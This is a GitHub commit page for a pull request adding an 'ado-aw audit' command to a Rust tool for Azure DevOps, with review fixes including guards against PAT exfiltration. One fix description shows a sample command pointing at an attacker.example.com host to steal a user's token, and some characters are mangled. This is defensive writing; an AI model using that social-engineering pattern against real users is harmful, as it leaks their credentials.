Commit 5c33e40
feat(audit): add
* feat(audit): add `ado-aw audit <build-id-or-url>` command
Single-run audit: download a build's artifacts, run every analyzer
(firewall, MCP gateway, OTel, safe outputs, detection verdict, build
timeline, missing tools/data/noops), and emit a Markdown or JSON
report. ADO-side counterpart to `gh aw audit`.
New module tree under `src/audit/`:
- `model.rs` — `AuditData` (drift-compatible with gh-aw's top-level
contract; adds ADO-specific `detection_analysis`,
`safe_output_execution`, `rejected_safe_outputs` sections).
- `url.rs` — parses bare IDs, dev.azure.com URLs, legacy
visualstudio.com URLs, and on-prem Azure DevOps Server URLs (with
optional `&j=`/`&t=`/`&s=` job/step anchors).
- `cache.rs` — CLI-version-keyed `run-summary.json` with atomic writes.
- `analyzers/{firewall,policy,mcp,otel,safe_outputs,detection,missing,jobs}.rs`
— eight defensive NDJSON/REST analyzers.
- `findings.rs` — eight heuristic rules emitting severity-rated
findings + recommendations.
- `render/{console,json}.rs` — two renderers; JSON shape is the
public contract.
- `cli.rs` — orchestration: URL parse → auth → metadata fetch →
artifact download → analyzers → findings → cache → render.
Unified rejection trace: when the aggregate `THREAT_DETECTION_RESULT`
has any threat flag set, every proposal lands in
`not_processed_due_to_aggregate_gate` carrying the aggregate
`reasons[]`, exactly one severity-`high` `KeyFinding` is emitted, and a
`rejected_safe_outputs` rollup appears at the top level.
Pipeline-side runtime additions (so an `ado-aw audit` of an existing
build has the data it needs):
- `src/data/*-base.yml` (via `AdoAwMarkerExtension`): emits
`staging/aw_info.json` at runtime with engine, model, agent name,
source path, target, compiler version, and ADO build context.
- `src/execute.rs`: writes a per-item `safe-outputs-executed.ndjson`
in `<output-dir>` so the audit can show the proposed → detection →
executed trace.
CLI surface:
ado-aw audit <build-id-or-url>
-o, --output <dir> # default ./logs
--json
--org / --project / --pat
--artifacts <agent,detection,safe-outputs>
--no-cache
New dependencies: `zip` (artifact unpack), `wiremock` (dev only —
integration test mock server).
Tests: 80 new audit unit tests + 3 integration tests against a fake
ADO REST server (happy path, permission-denied, cache hit) using a
thin `ADO_AW_TEST_ORG_URL` test seam. 1740 total tests pass.
Docs: new `docs/audit.md`; updates to `docs/cli.md`, `README.md`,
`AGENTS.md` index, and `prompts/debug-ado-agentic-workflow.md` (Step 1
first-move + new Step 2a-prime + `AuditData` reference + jq-diff
fallback).
Out of scope (explicit follow-ups): diff mode, cross-run trends,
`--parse` log.md/firewall.md, job/step-anchored audit, MCP-exposed
audit, per-item detection verdict (upstream coordination with gh-aw),
partial-approval gating, AWF policy-manifest plumbing, AWF
token-usage.jsonl, `audit-manifest.json` build inventory.
Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>
* fix(audit): address PR review feedback
Three issues raised by the Rust PR Reviewer on #691:
1. **Lexicographic sort wrong for multi-digit run IDs.** Previously
`find_artifact_dir` / `find_verdict_path` / `top_level_dirs_with_prefix`
picked the "lexicographically last" `<prefix>_<id>` directory, which
sorts `_9` after `_10` (because `'9' > '1'`). On a build retry that
produced both `analyzed_outputs_9` and `analyzed_outputs_10`, the
older verdict would be read and the run could be mis-classified as
safe.
New `crate::audit::cmp_numeric_suffix` extracts the trailing token
after the final `_`, parses it as `u64`, and compares numerically
with a lexicographic tie-breaker for non-numeric suffixes. All three
call sites now use it. Regression tests added in mod.rs, detection.rs,
and cli.rs.
2. **Security: `ADO_AW_TEST_ORG_URL` was always active in production.**
The override was `#[doc(hidden)]` but not gated by build mode, so a
stray env var (debugging leftover, hostile CI environment) could
silently redirect ADO REST calls to an attacker-controlled URL in a
release binary.
Gated on `cfg(debug_assertions)`: debug builds (`cargo test`,
`cargo run`) keep the override AND emit a loud `warn!` on every
invocation; release builds (all published artifacts via
`cargo build --release`) replace the body with a no-op so a stray
env var has no effect. The integration test in `tests/audit_it.rs`
continues to work because `cargo test` builds in debug mode.
3. **Blocking `std::fs::read_dir` in async context.** `safe_outputs.rs`
had two helpers (`top_level_dirs_with_prefix`, `collect_named_files`)
using sync I/O from inside `async fn analyze_safe_outputs`. On a
Tokio multi-thread runtime this blocks an executor thread for the
duration of the directory walk.
Both helpers converted to `async fn` using `tokio::fs::read_dir`.
The recursive `collect_named_files` uses `Box::pin` to satisfy the
async-recursion shape (consistent with the existing pattern in
`crate::detect::scan_directory`).
Tests: 1745 unit tests + 3 integration tests pass (up from 1740 — 5
new regression tests for the numeric-suffix bug).
Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>
* fix(audit): replace brittle status detection with structural flags
Two issues in src/execute.rs that made the executed-NDJSON manifest
silently mis-classify entries:
1. is_budget_exhausted parsed the human-readable message
("Skipped...maximum...already reached"). Any phrasing tweak to
check_budget would have silently downgraded budget-exhausted
records to status: "failed" in every audit log, with no
compile-time signal.
2. is_warning() entries (e.g. noop / missing-tool that succeeded
without ADO credentials) were emitted as status: "skipped",
conflating successful-but-no-op runs with the rejection bucket
used by the audit rollup.
Fixes:
- Add ExecutionResult.budget_exhausted: bool with budget_exhausted()
constructor and is_budget_exhausted() accessor. check_budget now
emits a structurally-tagged result; execution_record_status keys
off the flag. Refactor-safe.
- Map warning results to status: "warning" (distinct from "skipped").
Add SafeOutputStatus::Warning; counted toward executed_count, never
toward rejected_by_execution_count or the rejection rollup.
- Update affected unit tests; add coverage for budget_exhausted
serialization round-trip and warning-status analyzer mapping.
Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>
* fix(audit): attach auth to artifact downloads and guard against PAT exfil
Two issues surfaced by the adversarial review:
1. download_build_artifact discarded its �uth argument
src/ado/mod.rs::download_build_artifact took &AdoAuth but called
client.get(download_url).send() with no �uth.apply(...) wrapper,
silenced by let _ = auth;. For ADO artifact resource types whose
downloadUrl is not pre-signed (legacy/Container artifacts and many
on-prem ADO Server topologies) the request returned 401/403, and the
401 branch then misleadingly told the user to check their PAT scopes
— which had never been sent. Fix: wrap with �uth.apply(...) to
match list_build_artifacts / get_build. Pre-signed Artifact Services
URLs continue to work because they ignore the Authorization header in
favor of their sig= query string.
2. �udit <URL> sent the local PAT to any host in the URL
src/audit/url.rs accepted on-prem URLs with an arbitrary host;
apply_parsed_context_overrides plumbed that host straight into
ctx.org_url; and AdoAuth::apply then attached the PAT via HTTP Basic
Auth — to whatever host the URL named. A user social-engineered into
running �do-aw audit https://attacker.example.com/Coll/Proj/_build/results?buildId=1
would silently exfiltrate their PAT.
Fix: validate_audit_url_host() now runs before any auth-bearing
request. Microsoft-managed cloud hosts (dev.azure.com,
*.visualstudio.com) are always trusted. Any other host must match the
host in the trusted ADO context, which is itself resolved from --org
or the local git remote — both explicit, locally controlled trust
anchors. The check is host-suffix anchored (rejects .visualstudio.com
bare-suffix and �isualstudio.com.attacker.example lookalikes) and
case-insensitive.
Adds 11 unit tests covering: cloud-host allowlist (positive and
case-insensitive), bare-suffix / lookalike rejection,
trusted-context match, trusted-context mismatch, no-trusted-context
fallback, and host extraction edge cases.
Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>
* fix(audit): decouple trust-anchor resolution from --project requirement
Follow-up to ea9c032. The previous fix derived the trusted host from
resolve_ado_context(), which requires BOTH --org AND --project when
running outside a git repo. That created a UX regression: when a user
ran �do-aw audit https://onprem.example.com/coll/proj/_build/results?buildId=42
from an arbitrary folder with --org https://onprem.example.com/coll,
the trust anchor still came back as None (because --project wasn't
passed), and validate_audit_url_host then rejected the URL host telling
the user to "pass --org" — which they already had.
Fix: introduce resolve_trusted_host(cwd, org_flag) that derives a host
from --org if provided (any form normalize_org_url accepts), else from
the git remote of cwd, else None. validate_audit_url_host now takes
Option<&str> directly. Full-context resolution still runs afterward for
its original purpose (supplying defaults the URL overrides supersede).
Adds 4 regression tests, including one for the original failure mode:
running in an arbitrary folder with --org alone (no --project) must
yield a usable trust anchor.
Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>
---------
Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com>ado-aw audit <build-id-or-url> command (#691)1 parent 9c500e3 commit 5c33e40
34 files changed
Lines changed: 10775 additions & 192 deletions
File tree
- docs
- prompts
- src
- ado
- audit
- analyzers
- render
- compile/extensions
- safeoutputs
- tests
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
| |||
227 | 227 | | |
228 | 228 | | |
229 | 229 | | |
230 | | - | |
| 230 | + | |
| 231 | + | |
| 232 | + | |
| 233 | + | |
231 | 234 | | |
232 | 235 | | |
233 | 236 | | |
| |||
Some generated files are not rendered by default. Learn more about customizing how changed files appear on GitHub.
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
| |||
35 | 35 | | |
36 | 36 | | |
37 | 37 | | |
| 38 | + | |
38 | 39 | | |
39 | 40 | | |
40 | 41 | | |
| 42 | + | |
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
| |||
496 | 496 | | |
497 | 497 | | |
498 | 498 | | |
| 499 | + | |
| 500 | + | |
499 | 501 | | |
500 | 502 | | |
501 | 503 | | |
| |||
513 | 515 | | |
514 | 516 | | |
515 | 517 | | |
| 518 | + | |
516 | 519 | | |
517 | 520 | | |
518 | 521 | | |
| |||
0 commit comments